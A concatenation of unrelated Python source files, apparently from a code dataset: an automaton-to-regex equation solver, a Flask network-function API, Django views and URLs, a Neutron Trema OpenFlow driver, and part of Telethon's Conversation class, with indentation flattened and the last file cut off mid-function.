t2 = self.forrest.create_initial_union_node( param_symbols )
self.rhs[j] = self.forrest.union_two_ASTs( t1, t2 )
    # @brief remove the self recursion from RHS using Arden's rule: s1 = Ls1 | Rs2 | Ts3 => s1 = L*Rs2 | L*Ts3
def remove_self_recursion(self):
if self.lhs in self.rhs:
if self.rhs[self.lhs].ast_node_type == 'e':
self.remove_term( self.lhs )
else:
L_clone = self.forrest.clone_AST( self.rhs[self.lhs] )
L_star = self.forrest.repeat_AST( L_clone )
for s in self.rhs:
if s != self.lhs:
L_star_clone = self.forrest.clone_AST(L_star)
self.rhs[s] = self.forrest.concat_two_ASTs( L_star_clone, self.rhs[s] )
self.remove_term( self.lhs )
self.forrest.remove_AST(L_star)
# @brief prepend copy of L (AST) to each in RHS
# @param L : root node of AST
def prepend_coeff(self, L):
if L.ast_node_type != 'e':
for state in self.rhs:
L_clone = self.forrest.clone_AST(L)
self.rhs[state] = self.forrest.concat_two_ASTs( L_clone, self.rhs[state] )
# @brief merge the RHS of the specified equation into this RHS as part of row elimination
    # @param eq2 : the equation (SymbolicEquation) whose RHS is merged into this one.
    #              eq2 is completely consumed by this function, meaning the caller does not have to
    #              remove the residual coefficients in its RHS.
def merge_into( self, eq2 ):
eq2_vars = list(eq2.rhs.keys())
for s2 in eq2_vars:
if s2 in self.rhs:
t1 = self.rhs[s2]
t2 = eq2. rhs[s2]
merged_term = self.forrest.union_two_ASTs( t1, t2 )
self.rhs[s2] = merged_term
else:
self.rhs[s2] = eq2.rhs[s2]
del eq2.rhs[s2]
# remove remaining terms in eq2
eq2.clean_RHS()
# @brief make a clone of this equation.
def clone( self ):
eq_copy = SymbolicEquation( self.lhs, self.forrest )
for k in self.rhs:
eq_copy.rhs[k] = self.forrest.clone_AST( self.rhs[k] )
return eq_copy
# @brief clean up RHS (ASTs)
def clean_RHS(self):
keys = list(self.rhs.keys())
for k in keys:
self.remove_term( k )
# @brief remove the specified term from the RHS.
def remove_term( self, i ):
self.forrest.remove_AST( self.rhs[ i ] )
del self.rhs[ i ]
def diag_str(self):
out_str = ""
out_str += "S"
out_str += '{:02d}'.format(self.lhs)
out_str += " =\t"
sorted_keys = sorted( list( self.rhs.keys() ) )
first = True
for k in sorted_keys:
if first:
first = False
else:
out_str += " | "
out_str += self.rhs[k].regex
out_str += " S"
out_str += '{:02d}'.format(k)
return out_str
#
# @brief solve a set of simultaneous symbolic equations to transform
# a finite automaton to an abstract syntax tree.
# the variables are identified by an integer.
#  the coefficients for the variables are represented
# by regular expressions in sseASForrest.
# this solver uses the following types of nodes.
#  - selection/union            'u'
# - sequence/concatenation 's'
# - repetition '*'
# - epsilon 'e'
# - alphabet (terminal) 't1'--'t9999999' (positive number in string)
#
# Each equation has the following form.
# V0 = C1 V1 | C2 V2 | ... | Cx Vx
# V0 : variable on LHS
# Ci : coefficient for variable Vi on RHS
#
class SymbolicSimultaneousEquations():
# @param diag : if True, it generates diagnostics/debug info to console
def __init__(self, diag = False):
self.rows = {} # k: state, v: equation
self.start_state = -1
self.final_state = -1
self.forrest = nlpregex.regular_language.sse_forrest.sseASForrest()
self.diag = diag
    # @brief add a coefficient on the RHS of the specified equation
#
# @param i : row/equation number.
# @param j : column number
# @param symbols : list of terminals i.e., list of strings that represent numbers.
# e.g. 't0', 't1', ... 't999999'
# if there is only one terminal specified, the resultant AST is the terminal.
# if there are multiple terminals, then the resultant AST represents a selection
# whose children are the terminals.
# if there is a coefficient already present, then the symbols are added under
# the existing selection.
def add_coeff( self, i, j, symbols ):
if i not in self.rows:
self.rows[i] = SymbolicEquation( i, self.forrest )
if j not in self.rows:
self.rows[j] = SymbolicEquation( j, self.forrest )
self.rows[i].add_coeff( j, symbols )
# @brief solve the equations into an AST
#
# @param s : start variable in integer
# @param F : list of final variables in integer
#
# @return an AST in sseAST.
def solve( self, s, F):
# s : start state
# F : set of final states
# returns the single resultant regex.
self.start_state = self.max_index() + 1
self.rows[ self.start_state ] = SymbolicEquation( self.start_state, self.forrest )
self.add_coeff( self.start_state, s, ['e'] )
self.final_state = self.start_state + 1
for f in F:
self.add_coeff( f, self.final_state, ['e'] )
if self.diag:
print ("Initial State:")
print (self.diag_str())
while len(self.rows) > 2:
if self.diag:
print ( "Beginning of outer loop num rows: " + str(len(self.rows)) )
keys = list(self.rows.keys())
for i in keys:
if i != self.start_state and i != self.final_state :
self.eliminate_row( i )
# At this point only two rows for self.start_state and self.final_state exist.
# The row for start state has only one coefficient for self.final_state
        # The row for final state has always been empty.
final_coeff = self.rows[ self.start_state ].rhs[ self.final_state ]
self.forrest.remove_epsilons_from_unions( final_coeff )
self.forrest.create_tree_root_for_reduction( final_coeff )
return self.forrest
# @brief remove this row from the equations.
    # this is similar to Gaussian elimination.
def eliminate_row( self, i ):
if self.diag:
print ("Eliminate row " + str(i))
print (self.diag_str())
self.rows[i].remove_self_recursion()
if self.diag:
print ("After self-recursion")
print (self.diag_str())
for j in self.rows:
if i != j:
self.substitute(i, j)
# remove all the ASTs from the row[i] and then remove the row itself.
self.rows[i].clean_RHS()
del self.rows[i]
if self.diag:
print ("After row-elimination of " + str(i))
print (self.diag_str())
# @brief substitute the term i in row j with row i.
def substitute( self, i, j ):
if self.diag:
print ("Substitute " + str(i) + " into " + str(j) )
row_j = self.rows[j]
if i in row_j.rhs:
row_i_copy = self.rows[i].clone()
coeff_ji = row_j.rhs[i]
row_i_copy.prepend_coeff( coeff_ji )
row_j.merge_into( row_i_copy )
row_j.remove_term( i )
if self.diag:
print ("After substitution")
print (self.rows[j].diag_str())
def max_index( self ):
max_row = 0
for i in self.rows:
max_row = max(i,max_row)
return max_row
def diag_str(self):
out_str = ""
out_str += 'Start: S{:02d}'.format(self.start_state)
out_str += "\n"
out_str += 'Final: S{:02d}'.format(self.final_state)
out_str += "\n"
for i in self.rows:
row = self.rows[i]
out_str += row.diag_str()
out_str += "\n"
return out_str
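# --- Illustrative usage sketch (not part of the module above) ---
# Transliterating the two-state automaton  S0 --t1--> S1,  S1 --t2--> S1  with
# S0 the start state and S1 the only final state. Terminal names follow the
# 't<number>' convention described in the class comments above.
if __name__ == "__main__":
    eqs = SymbolicSimultaneousEquations(diag=True)
    eqs.add_coeff(0, 1, ['t1'])    # S00 = t1 S01
    eqs.add_coeff(1, 1, ['t2'])    # S01 = t2 S01
    forrest = eqs.solve(0, [1])    # the resulting AST should encode the regex t1 t2*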
|
StarcoderdataPython
|
5101573
|
<reponame>medianetlab/katana-slice_manager<filename>katana-nbi/katana/api/function.py
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import time
import uuid
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from katana.shared_utils.mongoUtils import mongoUtils
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class FunctionView(FlaskView):
route_prefix = "/api/"
req_fields = ["id", "gen", "func", "shared", "type", "location"]
def index(self):
"""
Returns a list of supported functions and their details,
used by: `katana function ls`
"""
data = mongoUtils.index("func")
return_data = []
for iserv in data:
return_data.append(
dict(
_id=iserv["_id"],
gen=(lambda x: "4G" if x == 4 else "5G")(iserv["gen"]),
func=(lambda x: "Core" if x == 0 else "Radio")(iserv["func"]),
type=(lambda x: "Virtual" if x == 0 else "Physical")(iserv["type"]),
func_id=iserv["id"],
loc=iserv["location"],
created_at=iserv["created_at"],
)
)
return dumps(return_data), 200
def get(self, uuid):
"""
Returns the details of specific function,
used by: `katana function inspect [uuid]`
"""
return dumps(mongoUtils.get("func", uuid)), 200
def post(self):
"""
Add a new supported function.
The request must provide the network function details.
used by: `katana func add -f [yaml file]`
"""
new_uuid = str(uuid.uuid4())
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = []
data["shared"]["sharing_list"] = {}
for field in self.req_fields:
try:
_ = data[field]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
try:
new_uuid = mongoUtils.add("func", data)
except pymongo.errors.DuplicateKeyError:
return f"Network Function with id {data['id']} already exists", 400
return f"Created {new_uuid}", 201
def delete(self, uuid):
"""
Delete a specific network function.
used by: `katana function rm [uuid]`
"""
result = mongoUtils.get("func", uuid)
if result:
if len(result["tenants"]) > 0:
return f"Error: Function is used by slices {result['tenants']}"
mongoUtils.delete("func", uuid)
return "Deleted Network Function {}".format(uuid), 200
else:
# if uuid is not found, return error
return "Error: No such Network Function: {}".format(uuid), 404
def put(self, uuid):
"""
Add or update a new supported network function.
The request must provide the service details.
used by: `katana function update -f [yaml file]`
"""
data = request.json
data["_id"] = uuid
old_data = mongoUtils.get("func", uuid)
if old_data:
data["created_at"] = old_data["created_at"]
data["tenants"] = []
data["shared"]["sharing_list"] = {}
if len(old_data["tenants"]) > 0:
return f"Error: Func is used by slices {old_data['tenants']}"
mongoUtils.update("func", uuid, data)
return f"Modified {uuid}", 200
else:
new_uuid = uuid
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = []
data["shared"]["sharing_list"] = {}
for field in self.req_fields:
try:
_ = data[field]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
try:
new_uuid = mongoUtils.add("func", data)
except pymongo.errors.DuplicateKeyError:
return f"Function with id {data['id']} already exists", 400
return f"Created {new_uuid}", 201
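# --- Illustrative registration sketch (not part of the API module above) ---
# With flask_classful the view is attached to an app via ``register``; combined
# with ``route_prefix`` the index should end up under /api/function/. The host
# and port below are placeholders.
if __name__ == "__main__":
    from flask import Flask
    app = Flask(__name__)
    FunctionView.register(app)   # GET /api/function/, GET /api/function/<uuid>, ...
    app.run(host="0.0.0.0", port=8000)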
|
StarcoderdataPython
|
5148037
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: <NAME>
# @author: <NAME>
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import ofc_client
from neutron.plugins.nec.db import api as ndb
from neutron.plugins.nec import ofc_driver_base
class TremaDriverBase(ofc_driver_base.OFCDriverBase):
"""Common class for Trema (Sliceable Switch) Drivers."""
networks_path = "/networks"
network_path = "/networks/%s"
def __init__(self, conf_ofc):
# Trema sliceable REST API does not support HTTPS
self.client = ofc_client.OFCClient(host=conf_ofc.host,
port=conf_ofc.port)
def _get_network_id(self, ofc_network_id):
# ofc_network_id : /networks/<network-id>
return ofc_network_id.split('/')[2]
def _get_tenant_id(self, tenant_id):
# Trema does not use tenant_id, but it returns
# /tenants/<tenant_id> format to keep consistency with PFC driver.
return '/tenants/' + tenant_id
def create_tenant(self, description, tenant_id=None):
return self._get_tenant_id(tenant_id or uuidutils.generate_uuid())
def update_tenant(self, ofc_tenant_id, description):
pass
def delete_tenant(self, ofc_tenant_id):
pass
def create_network(self, ofc_tenant_id, description, network_id=None):
ofc_network_id = network_id or uuidutils.generate_uuid()
body = {'id': ofc_network_id, 'description': description}
self.client.post(self.networks_path, body=body)
return self.network_path % ofc_network_id
def delete_network(self, ofc_network_id):
return self.client.delete(ofc_network_id)
def convert_ofc_tenant_id(self, context, ofc_tenant_id):
# If ofc_network_id starts with '/', it is already new-style
if ofc_tenant_id[0] == '/':
return ofc_tenant_id
return self._get_tenant_id(ofc_tenant_id)
def convert_ofc_network_id(self, context, ofc_network_id, tenant_id):
# If ofc_network_id starts with '/', it is already new-style
if ofc_network_id[0] == '/':
return ofc_network_id
# Trema sliceable switch does not use tenant_id,
# so we can convert ofc_network_id from old id only
return self.network_path % ofc_network_id
class TremaFilterDriver(object):
"""Trema (Sliceable Switch) PacketFilter Driver Mixin."""
filters_path = "/filters"
filter_path = "/filters/%s"
@classmethod
def filter_supported(cls):
return True
def create_filter(self, ofc_network_id, filter_dict,
portinfo=None, filter_id=None):
if filter_dict['action'].upper() in ["ACCEPT", "ALLOW"]:
ofc_action = "ALLOW"
elif filter_dict['action'].upper() in ["DROP", "DENY"]:
ofc_action = "DENY"
body = {'priority': filter_dict['priority'],
'slice': self._get_network_id(ofc_network_id),
'action': ofc_action}
ofp_wildcards = ["dl_vlan", "dl_vlan_pcp", "nw_tos"]
if portinfo:
body['in_datapath_id'] = portinfo.datapath_id
body['in_port'] = portinfo.port_no
else:
body['wildcards'] = "in_datapath_id"
ofp_wildcards.append("in_port")
if filter_dict['src_mac']:
body['dl_src'] = filter_dict['src_mac']
else:
ofp_wildcards.append("dl_src")
if filter_dict['dst_mac']:
body['dl_dst'] = filter_dict['dst_mac']
else:
ofp_wildcards.append("dl_dst")
if filter_dict['src_cidr']:
body['nw_src'] = filter_dict['src_cidr']
else:
ofp_wildcards.append("nw_src:32")
if filter_dict['dst_cidr']:
body['nw_dst'] = filter_dict['dst_cidr']
else:
ofp_wildcards.append("nw_dst:32")
if filter_dict['protocol']:
if filter_dict['protocol'].upper() in "ICMP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(1)
elif filter_dict['protocol'].upper() in "TCP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(6)
elif filter_dict['protocol'].upper() in "UDP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(17)
elif filter_dict['protocol'].upper() in "ARP":
body['dl_type'] = "0x806"
ofp_wildcards.append("nw_proto")
else:
body['nw_proto'] = filter_dict['protocol']
if filter_dict['eth_type']:
body['dl_type'] = filter_dict['eth_type']
else:
ofp_wildcards.append("dl_type")
else:
ofp_wildcards.append("dl_type")
ofp_wildcards.append("nw_proto")
if filter_dict['src_port']:
body['tp_src'] = hex(filter_dict['src_port'])
else:
ofp_wildcards.append("tp_src")
if filter_dict['dst_port']:
body['tp_dst'] = hex(filter_dict['dst_port'])
else:
ofp_wildcards.append("tp_dst")
ofc_filter_id = filter_id or uuidutils.generate_uuid()
body['id'] = ofc_filter_id
body['ofp_wildcards'] = ','.join(ofp_wildcards)
self.client.post(self.filters_path, body=body)
return self.filter_path % ofc_filter_id
def delete_filter(self, ofc_filter_id):
return self.client.delete(ofc_filter_id)
def convert_ofc_filter_id(self, context, ofc_filter_id):
# If ofc_filter_id starts with '/', it is already new-style
if ofc_filter_id[0] == '/':
return ofc_filter_id
return self.filter_path % ofc_filter_id
class TremaPortBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port base binding.
TremaPortBaseDriver uses port base binding.
Ports are identified by datapath_id, port_no and vlan_id.
"""
ports_path = "%(network)s/ports"
port_path = "%(network)s/ports/%(port)s"
def create_port(self, ofc_network_id, portinfo,
port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.ports_path % {'network': ofc_network_id}
body = {'id': ofc_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
return self.port_path % {'network': ofc_network_id,
'port': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id,
tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
return self.port_path % {'network': ofc_network_id,
'port': ofc_port_id}
class TremaPortMACBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port-mac base binding.
    TremaPortMACBaseDriver uses port-mac base binding.
Ports are identified by datapath_id, port_no, vlan_id and mac.
"""
ports_path = "%(network)s/ports"
port_path = "%(network)s/ports/%(port)s"
attachments_path = "%(network)s/ports/%(port)s/attachments"
attachment_path = "%(network)s/ports/%(port)s/attachments/%(attachment)s"
def create_port(self, ofc_network_id, portinfo, port_id=None):
        #NOTE: This driver creates slices with Port-MAC based bindings on Trema
        #      Sliceable Switch. Its REST API requires a port-based binding
        #      before you define a Port-MAC based binding.
ofc_port_id = port_id or uuidutils.generate_uuid()
dummy_port_id = "dummy-%s" % ofc_port_id
path = self.ports_path % {'network': ofc_network_id}
body = {'id': dummy_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
path = self.attachments_path % {'network': ofc_network_id,
'port': dummy_port_id}
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
path = self.port_path % {'network': ofc_network_id,
'port': dummy_port_id}
self.client.delete(path)
return self.attachment_path % {'network': ofc_network_id,
'port': dummy_port_id,
'attachment': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
dummy_port_id = 'dummy-%s' % ofc_port_id
return self.attachment_path % {'network': ofc_network_id,
'port': dummy_port_id,
'attachment': ofc_port_id}
class TremaMACBaseDriver(TremaDriverBase):
"""Trema (Sliceable Switch) Driver for mac base binding.
    TremaMACBaseDriver uses mac base binding.
Ports are identified by mac.
"""
attachments_path = "%(network)s/attachments"
attachment_path = "%(network)s/attachments/%(attachment)s"
@classmethod
def filter_supported(cls):
return False
def create_port(self, ofc_network_id, portinfo, port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.attachments_path % {'network': ofc_network_id}
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
return self.attachment_path % {'network': ofc_network_id,
'attachment': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
return self.attachment_path % {'network': ofc_network_id,
'attachment': ofc_port_id}
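# --- Illustrative usage sketch (not part of the plugin above) ---
# The drivers only need an object exposing ``host`` and ``port`` for the OFC
# REST endpoint; the address below is a placeholder and the calls would issue
# real HTTP requests against a Trema sliceable switch controller.
if __name__ == "__main__":
    from types import SimpleNamespace
    conf_ofc = SimpleNamespace(host="192.0.2.10", port=8888)    # hypothetical controller
    driver = TremaPortBaseDriver(conf_ofc)
    tenant = driver.create_tenant("demo tenant")                # -> /tenants/<uuid>
    network = driver.create_network(tenant, "demo network")     # -> /networks/<uuid>
    # create_port()/create_filter() would follow here, and finally:
    driver.delete_network(network)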
|
StarcoderdataPython
|
9650994
|
from django.conf.urls import url
from .views import (OrderCreateView,single_order,SingleOrder,
generate_PDF,ReportsView,AdminReportsView)
urlpatterns =[
url(r'^create_order/$',OrderCreateView.as_view(),name='create_order'),
url(r'^single_order/(?P<order_id>[0-9]+)/$',SingleOrder.as_view(),name='single_order'),
#url(r'^pdf/(?P<order_id>[0-9]+)/$',GeneratePdf.as_view(),name='pdf_view'),
url(r'^pdf/(?P<order_id>[0-9]+)/$',generate_PDF,name='pdf_view'),
url(r'^order_reports/$',ReportsView.as_view(),name='order_reports'),
url(r'^all_order_reports/$',AdminReportsView.as_view(),name='all_order_reports'),
]
|
StarcoderdataPython
|
1963602
|
from django.shortcuts import render, redirect
from django.views.generic import TemplateView
class IndexView(TemplateView):
"""Index view."""
template_name = "tosti/index.html"
def get(self, request, **kwargs):
"""
GET request for IndexView.
:param request: the request
:param kwargs: keyword arguments
:return: a render of the index page
"""
return render(request, self.template_name)
class PrivacyView(TemplateView):
"""Privacy policy view."""
template_name = "tosti/privacy.html"
class WelcomeView(TemplateView):
"""Welcome page."""
template_name = "tosti/welcome.html"
class DocumentationView(TemplateView):
"""Documentation page."""
template_name = "tosti/documentation.html"
def handler403(request, exception):
"""
Handle a 403 (permission denied) exception.
:param request: the request
:param exception: the exception
:return: a render of the 403 page
"""
if request.user.is_authenticated:
return render(request, "tosti/403.html", status=403)
else:
return redirect("users:login")
def handler404(request, exception):
"""
Handle a 404 (page not found) exception.
:param request: the request
:param exception: the exception
:return: a render of the 404 page
"""
return render(request, "tosti/404.html", status=404)
def handler500(request):
"""
Handle a 50x (server fault) exception.
:param request: the request
:return: a render of the 500 page
"""
return render(request, "tosti/500.html", status=500)
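# --- Illustrative wiring sketch (not part of the views module above) ---
# Django only uses handler403/handler404/handler500 when they are assigned in
# the ROOT_URLCONF, e.g. in a hypothetical tosti/urls.py:
#
#     from django.urls import path
#     from tosti import views
#
#     urlpatterns = [path("", views.IndexView.as_view(), name="index")]
#     handler403 = "tosti.views.handler403"
#     handler404 = "tosti.views.handler404"
#     handler500 = "tosti.views.handler500"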
|
StarcoderdataPython
|
6513060
|
<reponame>mhwdvs/MITSBot<gh_stars>0
from . import ozbargain
|
StarcoderdataPython
|
293982
|
<filename>src/visualization/recall.py<gh_stars>1-10
import streamlit as st
def recall_app():
st.title("Patient notes collection")
|
StarcoderdataPython
|
195249
|
import asyncio
import itertools
import time
from .chatgetter import ChatGetter
from ... import helpers, utils, errors
from ...events.common import EventCommon
# Sometimes the edits arrive very fast (within the same second).
# In that case we add a small delta so that the age is older, for
# comparison purposes. This value is enough for up to 1000 messages.
_EDIT_COLLISION_DELTA = 0.001
class Conversation(ChatGetter):
"""
    Represents a conversation inside a specific chat.
A conversation keeps track of new messages since it was
created until its exit and easily lets you query the
current state.
If you need a conversation across two or more chats,
you should use two conversations and synchronize them
as you better see fit.
"""
_id_counter = 0
_custom_counter = 0
def __init__(self, client, input_chat,
*, timeout, total_timeout, max_messages,
exclusive, replies_are_responses):
# This call resets the client
ChatGetter.__init__(self, input_chat=input_chat)
self._id = Conversation._id_counter
Conversation._id_counter += 1
self._client = client
self._timeout = timeout
self._total_timeout = total_timeout
self._total_due = None
self._outgoing = set()
self._last_outgoing = 0
self._incoming = []
self._last_incoming = 0
self._max_incoming = max_messages
self._last_read = None
self._custom = {}
self._pending_responses = {}
self._pending_replies = {}
self._pending_edits = {}
self._pending_reads = {}
self._exclusive = exclusive
# The user is able to expect two responses for the same message.
# {desired message ID: next incoming index}
self._response_indices = {}
if replies_are_responses:
self._reply_indices = self._response_indices
else:
self._reply_indices = {}
self._edit_dates = {}
async def send_message(self, *args, **kwargs):
"""
Sends a message in the context of this conversation. Shorthand
for `telethon.client.messages.MessageMethods.send_message` with
``entity`` already set.
"""
message = await self._client.send_message(
self._input_chat, *args, **kwargs)
self._outgoing.add(message.id)
self._last_outgoing = message.id
return message
async def send_file(self, *args, **kwargs):
"""
Sends a file in the context of this conversation. Shorthand
for `telethon.client.uploads.UploadMethods.send_file` with
``entity`` already set.
"""
message = await self._client.send_file(
self._input_chat, *args, **kwargs)
self._outgoing.add(message.id)
self._last_outgoing = message.id
return message
def mark_read(self, message=None):
"""
Marks as read the latest received message if ``message is None``.
Otherwise, marks as read until the given message (or message ID).
This is equivalent to calling `client.send_read_acknowledge
<telethon.client.messages.MessageMethods.send_read_acknowledge>`.
"""
if message is None:
if self._incoming:
message = self._incoming[-1].id
else:
message = 0
elif not isinstance(message, int):
message = message.id
return self._client.send_read_acknowledge(
self._input_chat, max_id=message)
async def get_response(self, message=None, *, timeout=None):
"""
Gets the next message that responds to a previous one.
Args:
message (`Message <telethon.tl.custom.message.Message>` | `int`, optional):
The message (or the message ID) for which a response
is expected. By default this is the last sent message.
timeout (`int` | `float`, optional):
If present, this `timeout` (in seconds) will override the
per-action timeout defined for the conversation.
"""
return await self._get_message(
message, self._response_indices, self._pending_responses, timeout,
lambda x, y: True
)
async def get_reply(self, message=None, *, timeout=None):
"""
Gets the next message that explicitly replies to a previous one.
"""
return await self._get_message(
message, self._reply_indices, self._pending_replies, timeout,
lambda x, y: x.reply_to_msg_id == y
)
def _get_message(
self, target_message, indices, pending, timeout, condition):
"""
Gets the next desired message under the desired condition.
Args:
target_message (`object`):
The target message for which we want to find another
response that applies based on `condition`.
indices (`dict`):
This dictionary remembers the last ID chosen for the
input `target_message`.
pending (`dict`):
This dictionary remembers {msg_id: Future} to be set
once `condition` is met.
timeout (`int`):
The timeout (in seconds) override to use for this operation.
condition (`callable`):
The condition callable that checks if an incoming
message is a valid response.
"""
start_time = time.time()
target_id = self._get_message_id(target_message)
# If there is no last-chosen ID, make sure to pick one *after*
# the input message, since we don't want responses back in time
if target_id not in indices:
for i, incoming in enumerate(self._incoming):
if incoming.id > target_id:
indices[target_id] = i
break
else:
indices[target_id] = len(self._incoming)
# We will always return a future from here, even if the result
# can be set immediately. Otherwise, needing to await only
# sometimes is an annoying edge case (i.e. we would return
# a `Message` but `get_response()` always `await`'s).
future = self._client.loop.create_future()
# If there are enough responses saved return the next one
last_idx = indices[target_id]
if last_idx < len(self._incoming):
incoming = self._incoming[last_idx]
if condition(incoming, target_id):
indices[target_id] += 1
future.set_result(incoming)
return future
# Otherwise the next incoming response will be the one to use
pending[target_id] = future
return self._get_result(future, start_time, timeout)
async def get_edit(self, message=None, *, timeout=None):
"""
Awaits for an edit after the last message to arrive.
The arguments are the same as those for `get_response`.
"""
start_time = time.time()
target_id = self._get_message_id(message)
target_date = self._edit_dates.get(target_id, 0)
earliest_edit = min(
(x for x in self._incoming
if x.edit_date
and x.id > target_id
and x.edit_date.timestamp() > target_date
),
key=lambda x: x.edit_date.timestamp(),
default=None
)
if earliest_edit and earliest_edit.edit_date.timestamp() > target_date:
self._edit_dates[target_id] = earliest_edit.edit_date.timestamp()
return earliest_edit
# Otherwise the next incoming response will be the one to use
future = asyncio.Future(loop=self._client.loop)
self._pending_edits[target_id] = future
return await self._get_result(future, start_time, timeout)
async def wait_read(self, message=None, *, timeout=None):
"""
Awaits for the sent message to be marked as read. Note that
receiving a response doesn't imply the message was read, and
this action will also trigger even without a response.
"""
start_time = time.time()
future = self._client.loop.create_future()
target_id = self._get_message_id(message)
if self._last_read is None:
self._last_read = target_id - 1
if self._last_read >= target_id:
return
self._pending_reads[target_id] = future
return await self._get_result(future, start_time, timeout)
async def wait_event(self, event, *, timeout=None):
"""
Waits for a custom event to occur. Timeouts still apply.
Unless you're certain that your code will run fast enough,
generally you should get a "handle" of this special coroutine
before acting. Generally, you should do this:
>>> from telethon import TelegramClient, events
>>>
>>> client = TelegramClient(...)
>>>
>>> async def main():
>>> async with client.conversation(...) as conv:
>>> response = conv.wait_event(events.NewMessage(incoming=True))
>>> await conv.send_message('Hi')
>>> response = await response
This way your event can be registered before acting,
since the response may arrive before your event was
registered. It depends on your use case since this
also means the event can arrive before you send
a previous action.
"""
start_time = time.time()
if isinstance(event, type):
event = event()
await event.resolve(self._client)
counter = Conversation._custom_counter
Conversation._custom_counter += 1
future = asyncio.Future(loop=self._client.loop)
# We need the `async def` here because we want to block on the future
# from `_get_result` by using `await` on it. If we returned the future
# immediately we would `del` from `_custom` too early.
async def result():
try:
return await self._get_result(future, start_time, timeout)
finally:
del self._custom[counter]
self._custom[counter] = (event, future)
return await result()
async def _check_custom(self, built):
for i, (ev, fut) in self._custom.items():
ev_type = type(ev)
inst = built[ev_type]
if inst and ev.filter(inst):
fut.set_result(inst)
def _on_new_message(self, response):
response = response.message
if response.chat_id != self.chat_id or response.out:
return
if len(self._incoming) == self._max_incoming:
self._cancel_all(ValueError('Too many incoming messages'))
return
self._incoming.append(response)
found = []
for msg_id in self._pending_responses:
found.append(msg_id)
self._response_indices[msg_id] = len(self._incoming)
for msg_id in found:
self._pending_responses.pop(msg_id).set_result(response)
found.clear()
for msg_id in self._pending_replies:
if msg_id == response.reply_to_msg_id:
found.append(msg_id)
self._reply_indices[msg_id] = len(self._incoming)
for msg_id in found:
self._pending_replies.pop(msg_id).set_result(response)
def _on_edit(self, message):
message = message.message
if message.chat_id != self.chat_id or message.out:
return
found = []
for msg_id, pending in self._pending_edits.items():
if msg_id < message.id:
found.append(msg_id)
edit_ts = message.edit_date.timestamp()
# We compare <= because edit_ts resolution is always to
# seconds, but we may have increased _edit_dates before.
# Since the dates are ever growing this is not a problem.
if edit_ts <= self._edit_dates.get(msg_id, 0):
self._edit_dates[msg_id] += _EDIT_COLLISION_DELTA
else:
self._edit_dates[msg_id] = message.edit_date.timestamp()
for msg_id in found:
self._pending_edits.pop(msg_id).set_result(message)
def _on_read(self, event):
if event.chat_id != self.chat_id or event.inbox:
return
self._last_read = event.max_id
remove_reads = []
for msg_id, pending in self._pending_reads.items():
if msg_id >= self._last_read:
remove_reads.append(msg_id)
pending.set_result(True)
for to_remove in remove_reads:
del self._pending_reads[to_remove]
def _get_message_id(self, message):
if message is not None: # 0 is valid but false-y, check for None
return message if isinstance(message, int) else message.id
elif self._last_outgoing:
return self._last_outgoing
else:
raise ValueError('No message was sent previously')
def _get_result(self, future, start_time, timeout):
due = self._total_due
if timeout is None:
timeout = self._timeout
if timeout is not None:
due = min(due, start_time + timeout)
return asyncio.wait_for(
future,
